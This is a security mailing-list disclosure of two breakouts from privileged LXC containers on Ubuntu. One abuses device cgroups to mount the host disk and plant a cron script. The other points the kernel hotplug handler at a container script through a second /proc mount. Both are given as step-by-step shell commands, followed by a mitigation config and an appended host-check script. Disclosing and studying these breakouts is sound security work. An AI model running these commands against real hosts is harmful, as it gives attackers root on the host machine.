Date: Tue, 12 Feb 2019 23:34:43 +0500
From: "Alexander E. Patrakov" <patrakov@...il.com>
To: oss-security@...ts.openwall.com
Cc: lxc-users@...ts.linuxcontainers.org
Subject: Two more LXC breakouts (both privileged), apparmor issue?

Hello,

there is a container breakout currently discussed (CVE-2019-5736), which affected LXC among others. Let me share two more, IMHO easier, breakout techniques that work against LXC, at least in Ubuntu 18.10, which has LXC 3.0.3.

Both techniques work only in privileged containers, and so, given that LXC upstream does not treat privileged containers as a viable security boundary, I don't think there is anything CVE-worthy here, just an opportunity to tighten the defaults, unless this is a bug in AppArmor or its policies. Also, please treat this whole email as Ubuntu-specific, because of the references to AppArmor.

The primary goal of this email is to post exploits, so that I can point people to something better than just nonconstructive words about "security implications" when they ask :)

The secondary goal is to learn a bit more about AppArmor, i.e. I was surprised that the "mount" step works in the first exploit, want to know why. I.e. what's the real difference between "lxc-container-default" and "lxc-container-default-with-mounting" profiles.

When reproducing exploits, it is important that you install openssh in the test containers, and work from an ssh connection, not lxc-attach. That's because of slightly-different namespace setups, and because lxc-attach requires root, so "you already have to be root to break out", i.e. the achievement becomes too trivial.

Prior art:

- myself trying to debug why the memory limit does not apply: https://github.com/lxc/lxc/issues/2845
- an existing bug about unintended access to block devices: https://github.com/lxc/lxc/issues/2762

Exploit 1: abuse of device cgroups and block devices

Prerequisite: a privileged container created with the "download" template, without tweaking any AppArmor settings.
E.g.:

sudo lxc-create -t download -n exploit1 -- -d ubuntu -r cosmic -a amd64

Install openssh there, then let a hacker ssh into it and let them sudo to root. So now the hacker has root in a privileged container.

By default, the container is covered by the "lxc-container-default-cgns" profile. Or at least, that's what is mentioned in dmesg in denial messages. It specifically allows mounting of cgroup and cgroup2 filesystems under /sys/fs/cgroup. And, by default, LXC relies on systemd inside the container to mount the cgroup hierarchies that it needs.

There are also other profiles that can be used but are not the default:

- lxc-container-default: does not allow mounting cgroup and cgroup2
- lxc-container-default-with-mounting: does not allow mounting cgroup and cgroup2, but supposedly allows ext2/3/4, xfs, and btrfs.
- lxc-container-default-with-nesting: allows cgroup and cgroup2, also allows almost arbitrary bind mounts.

So, to break out, let's exploit the fact that, on Ubuntu, cgroups are the only protection against mounting arbitrary block devices in containers - but, by default, there is nothing that prevents the hacker from lifting the restriction from within a container. So:

# Step 1: find all device cgroups, add permission to use all block devices.
f=`find /sys/fs/cgroup -name devices.allow`
for d in $f ; do echo -n 'b *:* rwm' > "$d" ; done # you may need to repeat this a few times
for d in $f ; do echo -n 'b *:* rwm' > "$d" ; done # ok, repeating

# Step 2: find an interesting block device, create a device node and mount it.
cat /proc/partitions # found /dev/vda1, looks like the host's root fs is there
mknod /dev/vda1 b 252 1 # based on numbers from /proc/partitions
mount /dev/vda1 /mnt # I don't know why this succeeds (on ext4), but it does

# Step 3: write some code that will run on the host
nano /mnt/etc/cron.d/badscript

# Step 4: wait for cron to run it on the host

I was able to mitigate this by not letting the container access any cgroups except the bare minimum necessary for systemd to function. Not sure if this creates other security problems.

lxc.apparmor.profile = lxc-container-default
lxc.mount.entry = tmpfs sys/fs/cgroup tmpfs nosuid,nodev,noexec,mode=755
lxc.mount.entry = cgroup sys/fs/cgroup/systemd cgroup nosuid,nodev,noexec,xattr,name=systemd,create=dir

Question: why is this not the default?

Exploit 2: abuse of hotplug handler

Prerequisite: setup for nested privileged containers. E.g. this:

sudo lxc-create -t download -n exploit2 -- -d ubuntu -r cosmic -a amd64

... with this line uncommented in the config:

lxc.include = /usr/share/lxc/config/nesting.conf

(the config does warn about "security implications", but this is not enough to convince people; "known root hole" would be a better wording).

To break out, let's exploit the fact that the kernel, when told so via /proc, will run arbitrary programs for us. I mean, in reaction to hotplug events - the legacy handler is settable via /proc/sys/kernel/hotplug. There are some rules in the apparmor profile that prohibit writing there, but apparmor is path-based, and these rules would not fire if a copy of /proc is mounted somewhere else (which is needed for nesting but is disallowed otherwise). So:

# Step 1: write a script that will run on the host.
nano /badscript
chmod +x /badscript

# Step 2: make it a hotplug event handler via a second instance of /proc
mkdir /proc2
mount --bind /proc /proc2
echo /var/lib/lxc/exploit2/rootfs/badscript > /proc2/sys/kernel/hotplug
# Well, there was some guessing here based on the default container path, I hope it's OK

# Step 3: provoke some hotplug event. Actually, several events.
ip link add dummy0 type dummy

-- 
Alexander E. Patrakov
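
For anyone checking a host against Exploit 2 rather than reproducing it, here is a minimal sketch of two host-side checks. It is only an illustration under stated assumptions: the function names are hypothetical (they are not part of LXC), the first check only looks for an uncommented lxc.include line that ends up at nesting.conf, and the second treats a missing or empty /proc/sys/kernel/hotplug as "no legacy handler set".

```shell
#!/bin/sh
# Hypothetical helper names; neither function is part of LXC.

# Succeeds if the given LXC config file contains an uncommented
# lxc.include line that pulls in nesting.conf.
config_enables_nesting() {
    grep -Eq '^[[:space:]]*lxc\.include[[:space:]]*=[[:space:]]*[^#]*nesting\.conf' "$1"
}

# Succeeds if no legacy hotplug handler is set. The file to read is a
# parameter (defaulting to the real /proc entry) so that the check can
# be pointed at a copy. A missing file is treated as "unset".
hotplug_handler_unset() {
    handler=$(cat "${1:-/proc/sys/kernel/hotplug}" 2>/dev/null)
    [ -z "$handler" ]
}

# Example use on the host (assumes the default /var/lib/lxc layout):
#   for cfg in /var/lib/lxc/*/config; do
#       config_enables_nesting "$cfg" && echo "nesting enabled: $cfg"
#   done
#   hotplug_handler_unset || echo "hotplug handler is set"
```

A handler that shows up unexpectedly on the host, together with a privileged container that includes nesting.conf, is worth a closer look; an empty result from both checks does not by itself show that the host is safe.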